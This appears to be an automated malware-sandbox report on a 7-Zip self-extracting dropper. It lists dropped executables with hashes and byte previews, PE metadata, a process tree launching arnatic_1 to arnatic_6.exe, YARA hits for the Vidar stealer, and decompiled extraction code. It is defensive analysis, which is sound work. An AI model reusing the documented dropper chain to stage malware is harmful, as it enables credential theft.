Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.S...............0..............5... ...@....@.. ....................................@.................................p5..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................5......H........9..........OG..h...t]..................................................g.......y....(.H...s.B...Z.......(i...f....(j...r-..p(....(k...f....ol...(m...ol...on....sBG.......f....ol...r.$.p(....on...f....o....r.$.p(....on...f....o....rE%.p(....(k........o....r.%.p(....rq..p(....r...p(....(....on...f....o....r&.p(....(k...f....o....rl&.p(....(k...f....o....r.&.p(....(k...f....o....ra'.p(....(k....~....:#...r.'.p(.....#...(....o....s.........~.....~.....~

C:\Users\user\Documents\z55am8ntfc1tzTQLqXuERA8s.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	49152:i+p0eyG6i0tn1oDIbPcyMROF0V7POqqT4xUXZoMNjkximOk0NaizPA:iY0ex6HqDKyi0dGqqT4ejkxw3s
MD5:	93121163AA243AC42A179A08399AEB07
SHA1:	1E5BEC2A61AFF7C1225103559CE3AC05FE3D8FC7
SHA-256:	7CCFDD6FB206ED5410CE2AA681FDFC0548F4C90DB27A9342B293EA35BBA58B85
SHA-512:	D3E93D59D13881ED3F9B029EDC267E227E33A4ACE31728F36919B9668908F50A4FA9B9244E2B45642D6A844D5C9042BF18F98B4868910FFFF82634EB4F1587FE
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.....Iu7.....................................\|.O. ....`M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@............3...P......................@.............1.........................@....rsrc........`M.......0.............@....A4SqVtu......O......62.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................

C:\Users\user\Documents\zCgmVlJU85h7EoUzOQ69Wnzh.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:t8f39B+OecSnrJYG4oPSidpXPQvzJetHu7MgUEjumXKHt:worJYGPd1PQ7JUaMjEygK
MD5:	2DBF77866712D9EBD57EC65E7C1598A8
SHA1:	25693E771D3D25112FFA7C38875DECD562AC808D
SHA-256:	2E382DCD1F433490E453D5E7E710D2BB821C2DF09F1E16B675EE060D46DA80D6
SHA-512:	609AA7242A8908AD7B59FD5F303492DDF435320106219D9E35F88B6A9976ADC72CA1E72CD17F714D349E430F8A0D330837C81AD947AC62E4DCD2C83D32A2DBA3
Malicious:	false
Reputation:	unknown
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L...P.................0......F........... ... ....@.................................+.....@..................................0.......@...D...........................................................................................................data.... .............................`.shared......0......................@....rsrc....D...@...D..................@..@.CRT.............x...L..............@......................................................................................................................................................................................................................................................................................................................kg...}R..hI.>..H......,.

\Device\ConDrv Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4546
Entropy (8bit):	5.060083473559269
Encrypted:	false
SSDEEP:	96:yjUjnIjjjskn/DUD8CtiApkxehrPDh/cRRh9vZEZfN:yjUjIjjjxn/gttiMRrPDh/cPhVZEZV
MD5:	EF0286D779838C086EF1C19A66BD6057
SHA1:	781E687744FCC55B91463E6FF80CC0ACA8DA6F3A
SHA-256:	EC495690DE8A49FE4F7ED813040AE2130BFFAC40C7ED345DA765F12BCF5B6CE6
SHA-512:	894AAFC36068CDCAB0B079BAC8318730D05B083E7E072BD74B62755628A6792988BF365721653DF26F985B16EF7105AB6E83E4171FC11CA90E5A6C738F786762
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->.. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->.. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->..<head>..<title>Suspected phishing site \| Cloudflare</title>..<meta charset="UTF-8" />..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />..<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />..<meta name="robots" content="noindex, nofollow" />..<meta name="viewport" content="width=device-width,initial-scale=1" />..<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />.. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->..<style type="text/css">body{margin:0;padding:0}<

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.990283922439568
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File size:	2831917
MD5:	971e01647fbdc05bef3df71b008e2ca6
SHA1:	d8122ee820db5d937056c2f1fd0b7bbf89d8b9c1
SHA256:	0ca57f85e88001edd67dff84428375de282f0f92e5bef2daed1c03ad2fa7612e
SHA512:	89d409d331ea527570584e9d0f76f48b0ad84f6e85ae90a0446c436078d503a10dbf78fa67bbe14a07d05b0c00e0edf81c25e1545ced29d7a72a0ea5aa892780
SSDEEP:	49152:xcB7PkZVi7iKiF8cUvFyPj0TbOTDTfr6pKTfHblwVj+jcEwJ84vLRaBtIl9mTIGU:xbri7ixZUvFyPj0gnzesrCvLUBsKIA8l
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B...]...B...^...B...]...B...]...B...J...B...B...B...J...B...d...B...d...B....6..B.......B..]D...B..Rich.B.........

File Icon


Icon Hash:	8484d4f2b8f47434

Static PE Info

General
Entrypoint:	0x41910c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NX_COMPAT
Time Stamp:	0x5C6ECB00 [Thu Feb 21 16:00:00 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	32569d67dc210c5cb9a759b08da2bdb3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041C298h
push 00419106h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041B0E8h]
pop ecx
or dword ptr [004213E4h], FFFFFFFFh
or dword ptr [004213E8h], FFFFFFFFh
call dword ptr [0041B0ECh]
mov ecx, dword ptr [0041F3C8h]
mov dword ptr [eax], ecx
call dword ptr [0041B0F0h]
mov ecx, dword ptr [0041F3C4h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041B0F4h]
mov eax, dword ptr [eax]
mov dword ptr [004213ECh], eax
call 00007F9C58C886A1h
cmp dword ptr [0041F150h], ebx
jne 00007F9C58C8858Eh
push 00419294h
call dword ptr [0041B0F8h]
pop ecx
call 00007F9C58C88673h
push 0041F038h
push 0041F034h
call 00007F9C58C8865Eh
mov eax, dword ptr [0041F3C0h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0041F3BCh]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041B100h]
push 0041F030h
push 0041F000h
call 00007F9C58C8862Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[ C ] VS2010 SP1 build 40219
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e1bc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0xab0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x1b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19745	0x19800	False	0.583438648897	DOS executable (COM)	6.6301384284	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x3a98	0x3c00	False	0.3345703125	data	4.39318766185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x23f0	0x200	False	0.369140625	data	3.30022863793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.sxdata	0x22000	0x4	0x200	False	0.02734375	data	0.0203931352361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ
.rsrc	0x23000	0xab0	0xc00	False	0.344401041667	data	3.32928574611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x234d0	0x2e8	data	English	United States
RT_ICON	0x237b8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x23908	0xb8	data	English	United States
RT_STRING	0x239c0	0x60	data	English	United States
RT_STRING	0x23a20	0x54	data	English	United States
RT_STRING	0x23a78	0x34	data	English	United States
RT_GROUP_ICON	0x238e0	0x22	data	English	United States
RT_VERSION	0x23210	0x2bc	data	English	United States

Imports

DLL	Import
OLEAUT32.dll	SysStringLen, SysAllocStringLen, VariantClear
USER32.dll	DialogBoxParamW, SetWindowLongW, GetWindowLongW, GetDlgItem, LoadStringW, CharUpperW, DestroyWindow, EndDialog, PostMessageW, SetWindowTextW, ShowWindow, MessageBoxW, SendMessageW, LoadIconW, KillTimer, SetTimer
SHELL32.dll	ShellExecuteExW
MSVCRT.dll	_controlfp, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ?terminate@@YAXXZ, ??1type_info@@UAE@XZ, _except_handler3, _beginthreadex, memset, wcsstr, free, malloc, memcpy, _CxxThrowException, _purecall, memmove, memcmp, wcscmp, __CxxFrameHandler
KERNEL32.dll	WaitForSingleObject, GetStartupInfoA, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, lstrlenW, lstrcatW, VirtualFree, VirtualAlloc, Sleep, WaitForMultipleObjects, GetFileInformationByHandle, GetStdHandle, GlobalMemoryStatus, GetSystemInfo, GetCurrentProcess, GetProcessAffinityMask, SetEndOfFile, WriteFile, ReadFile, SetFilePointer, GetFileSize, GetFileAttributesW, GetModuleHandleA, FindNextFileW, FindFirstFileW, FindClose, GetCurrentThreadId, GetTickCount, GetCurrentProcessId, GetTempPathW, GetCurrentDirectoryW, SetCurrentDirectoryW, SetLastError, DeleteFileW, CreateDirectoryW, GetModuleHandleW, GetProcAddress, RemoveDirectoryW, SetFileAttributesW, CreateFileW, SetFileTime, GetSystemDirectoryW, FormatMessageW, LocalFree, GetModuleFileNameW, LoadLibraryExW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, GetVersionExW, GetCommandLineW, CreateProcessW, CloseHandle

Version Infos

Description	Data
LegalCopyright	Copyright (c) 1999-2018 Igor Pavlov
InternalName	7zS.sfx
FileVersion	19.00
CompanyName	Igor Pavlov
ProductName	7-Zip
ProductVersion	19.00
FileDescription	7z Setup SFX
OriginalFilename	7zS.sfx.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe PID: 7156 Parent PID: 5280

General

Start time:	19:29:29
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe"
Imagebase:	0x400000
File size:	2831917 bytes
MD5 hash:	971E01647FBDC05BEF3DF71B008E2CA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: setup_install.exe PID: 5976 Parent PID: 7156

General

Start time:	19:29:34
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe"
Imagebase:	0x400000
File size:	297472 bytes
MD5 hash:	774F0D5B7DC3D2AD9CC4A0D921C9DA8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6004 Parent PID: 5976

General

Start time:	19:29:35
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6548 Parent PID: 5976

General

Start time:	19:29:36
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_1.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4964 Parent PID: 5976

General

Start time:	19:29:36
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_2.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: arnatic_1.exe PID: 5768 Parent PID: 6548

General

Start time:	19:29:36
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe
Wow64 process (32bit):	true
Commandline:	arnatic_1.exe
Imagebase:	0x400000
File size:	729724 bytes
MD5 hash:	6E43430011784CFF369EA5A5AE4B000F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5868 Parent PID: 5976

General

Start time:	19:29:37
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_3.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: arnatic_2.exe PID: 4784 Parent PID: 4964

General

Start time:	19:29:37
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe
Wow64 process (32bit):	true
Commandline:	arnatic_2.exe
Imagebase:	0x400000
File size:	248832 bytes
MD5 hash:	68BC76A5DF7A7C5368E8AC9484584825
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6576 Parent PID: 5976

General

Start time:	19:29:37
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_4.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: arnatic_3.exe PID: 6564 Parent PID: 5868

General

Start time:	19:29:37
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe
Wow64 process (32bit):	true
Commandline:	arnatic_3.exe
Imagebase:	0x400000
File size:	625152 bytes
MD5 hash:	208EF3505E28717F9227377DA516C109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.424491159.00000000023E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000000.316957711.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000000.322961935.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000000.321122893.00000000023E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6592 Parent PID: 5976

General

Start time:	19:29:37
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_5.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: arnatic_4.exe PID: 6568 Parent PID: 6576

General

Start time:	19:29:38
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe
Wow64 process (32bit):	false
Commandline:	arnatic_4.exe
Imagebase:	0xd30000
File size:	8192 bytes
MD5 hash:	DBC3E1E93FE6F9E1806448CD19E703F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cmd.exe PID: 4020 Parent PID: 5976

General

Start time:	19:29:38
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c arnatic_6.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: arnatic_5.exe PID: 4816 Parent PID: 6592

General

Start time:	19:29:38
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
Wow64 process (32bit):	true
Commandline:	arnatic_5.exe
Imagebase:	0xe20000
File size:	860160 bytes
MD5 hash:	4A1A271C67B98C9CFC4C6EFA7411B1DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe PID: 7156 Parent PID: 5280 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exeCOMMON

Execution Graph

Execution Coverage:	17.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 0040BD85, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 864
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0040BD85(intOrPtr __ecx, void* __eflags) {
				void* __edi;
				signed int _t457;
				signed int _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t477;
				signed int _t478;
				signed int _t484;
				signed int _t487;
				void* _t489;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				intOrPtr _t500;
				signed int _t502;
				signed int _t503;
				signed int _t507;
				signed int _t508;
				signed int _t514;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t528;
				signed int _t536;
				signed int* _t540;
				signed int _t545;
				void* _t548;
				signed int _t552;
				intOrPtr* _t558;
				signed int _t559;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				signed char _t567;
				signed int _t569;
				signed int _t577;
				signed int _t579;
				signed int _t580;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t594;
				void* _t597;
				signed int _t608;
				signed int _t610;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				intOrPtr _t616;
				intOrPtr _t632;
				signed int _t636;
				intOrPtr* _t637;
				signed int _t644;
				signed int _t685;
				signed int _t694;
				signed int _t698;
				intOrPtr* _t699;
				signed int _t746;
				signed int _t747;
				intOrPtr* _t752;
				intOrPtr _t757;
				signed int _t759;
				intOrPtr _t760;
				signed int _t763;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t771;
				signed int _t772;
				char* _t774;
				signed int* _t775;
				char* _t776;
				signed int _t777;
				signed int _t778;
				intOrPtr _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr* _t787;
				intOrPtr _t788;
				void* _t789;
				void* _t790;
				void* _t795;

				_t795 = __eflags;
				E00418D80(E0041A180, _t790);
				_t610 =  *(_t790 + 0x14);
				_t771 =  *(_t790 + 0x18);
				 *( *(_t790 + 0x2c)) =  *( *(_t790 + 0x2c)) & 0x00000000;
				 *((intOrPtr*)(_t790 - 0x14)) = __ecx;
				_t763 = _t771 << 2;
				 *(_t790 - 0x2c) =  *((intOrPtr*)(_t610 + 8)) +  *(_t763 +  *((intOrPtr*)(_t610 + 0x30))) * 8;
				E0040CA12(_t790 - 0x4c);
				 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
				E0040F0A2(_t610, _t795, _t771, _t790 - 0x4c);
				 *(_t790 - 0x34) =  *( *((intOrPtr*)(_t610 + 0x34)) + _t771) & 0x000000ff;
				if( *(_t790 - 0x48) <= 0x20) {
					E0040BC96(_t790 - 0xc4);
					 *(_t790 - 4) = 1;
					E0040E83C(_t790 - 0x84);
					 *(_t790 - 4) = 2;
					E0040CB0A(_t790 - 0x4c, _t790 - 0xc4, __eflags);
					_t457 = E00407F05(_t790 - 0xc4, _t763, __eflags);
					__eflags = _t457;
					if(_t457 == 0) {
						L118:
						_t772 = 0x80004001;
						L172:
						_t437 = _t790 - 4;
						 *_t437 =  *(_t790 - 4) & 0x00000000;
						__eflags =  *_t437;
						E00403204(_t457,  *((intOrPtr*)(_t790 - 0x84)));
						E0040C85F(_t790 - 0xc4);
						goto L173;
					}
					_t462 =  *((intOrPtr*)(_t610 + 0x28));
					 *(_t790 + 0x17) = 1;
					_t746 = ( *( *((intOrPtr*)(_t610 + 0x34)) + _t771) & 0x000000ff) +  *(_t763 +  *((intOrPtr*)(_t610 + 0x2c)));
					__eflags =  *(_t790 + 0x1c);
					_t632 =  *((intOrPtr*)(_t462 + _t746 * 8));
					_t457 =  *(_t462 + 4 + _t746 * 8);
					if( *(_t790 + 0x1c) == 0) {
						L13:
						_t774 =  *((intOrPtr*)(_t790 - 0x14));
						__eflags =  *_t774;
						if( *_t774 == 0) {
							L15:
							_t463 =  *((intOrPtr*)(_t790 - 0x14));
							_t775 = _t463 + 0x5c;
							_t464 =  *(_t463 + 0x5c);
							__eflags = _t464;
							if(_t464 != 0) {
								 *((intOrPtr*)( *_t464 + 8))(_t464);
								 *_t775 =  *_t775 & 0x00000000;
								__eflags =  *_t775;
							}
							_push(0x84);
							_t465 = E004031DD();
							 *(_t790 + 0x18) = _t465;
							__eflags = _t465;
							 *(_t790 - 4) = 3;
							if(__eflags == 0) {
								_t466 = 0;
								__eflags = 0;
							} else {
								_t466 = E0040C88E(_t465, __eflags, 0);
							}
							 *(_t790 - 4) = 2;
							 *( *((intOrPtr*)(_t790 - 0x14)) + 0x54) = _t466;
							E004063E5(_t775, _t466);
							_t636 =  *( *((intOrPtr*)(_t790 - 0x14)) + 0x54);
							__eflags = _t636;
							if(_t636 == 0) {
								_t637 = 0;
								__eflags = 0;
							} else {
								_t637 = _t636 + 4;
							}
							_t776 =  *((intOrPtr*)(_t790 - 0x14));
							_t747 = _t790 - 0xc4;
							 *((intOrPtr*)(_t776 + 0x58)) = _t637;
							_t457 =  *((intOrPtr*)( *_t637))(_t747);
							__eflags = _t457;
							if(_t457 == 0) {
								__eflags =  *(_t790 - 0x48);
								 *(_t790 - 0x18) = 0;
								if(__eflags <= 0) {
									L35:
									E00408339(_t776 + 4, __eflags, _t790 - 0xc4);
									E0040CE11(_t776 + 0x44, _t790 - 0x84);
									 *_t776 = 1;
									_t774 =  *((intOrPtr*)(_t790 - 0x14));
									L36:
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t774 + 0x58)))) + 0x10))();
									 *(_t790 + 0x1b) =  *(_t790 + 0x1b) & 0;
									__eflags =  *(_t790 - 0x48);
									_t477 =  *(_t763 +  *((intOrPtr*)(_t610 + 0x2c)));
									 *((intOrPtr*)(_t790 - 0x30)) = 0;
									 *(_t790 - 0x78) = _t477;
									 *((intOrPtr*)(_t790 - 0x1c)) = 0;
									if( *(_t790 - 0x48) <= 0) {
										L100:
										_t777 =  *(_t790 - 0x2c);
										__eflags =  *(_t790 + 0x20);
										if( *(_t790 + 0x20) != 0) {
											__eflags =  *(_t790 + 0x17);
											_t268 =  *(_t790 + 0x17) == 0;
											__eflags = _t268;
											 *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 0xc))(_t747 & 0xffffff00 | _t268);
										}
										 *((intOrPtr*)(_t790 - 0x70)) = 0;
										 *(_t790 - 0x6c) = 0;
										 *((intOrPtr*)(_t790 - 0x68)) = 0;
										_push(0x30);
										 *(_t790 - 4) = 0xf;
										_t478 = E004031DD();
										 *(_t790 + 0x30) = _t478;
										__eflags = _t478;
										 *(_t790 - 4) = 0x10;
										if(_t478 == 0) {
											_t765 = 0;
											__eflags = 0;
										} else {
											_t765 = E0040CD3D(_t478);
										}
										__eflags = _t765;
										 *(_t790 + 0x30) = _t765;
										 *(_t790 - 4) = 0xf;
										 *(_t790 + 0x34) = _t765;
										if(_t765 != 0) {
											 *((intOrPtr*)( *_t765 + 4))(_t765);
										}
										__eflags =  *(_t790 - 0x38) - 1;
										_t613 =  *(_t790 + 8);
										 *(_t790 - 4) = 0x11;
										if( *(_t790 - 0x38) <= 1) {
											L128:
											 *(_t790 + 0x18) =  *(_t790 + 0x18) & 0x00000000;
											__eflags =  *(_t790 - 0x38);
											if( *(_t790 - 0x38) <= 0) {
												L144:
												_t479 =  *(_t790 - 0x6c);
												_t778 = 0;
												__eflags = _t479;
												_t614 = _t479;
												 *(_t790 + 0x1c) = 0;
												if(_t479 != 0) {
													__eflags = _t479 - 0x3fffffff;
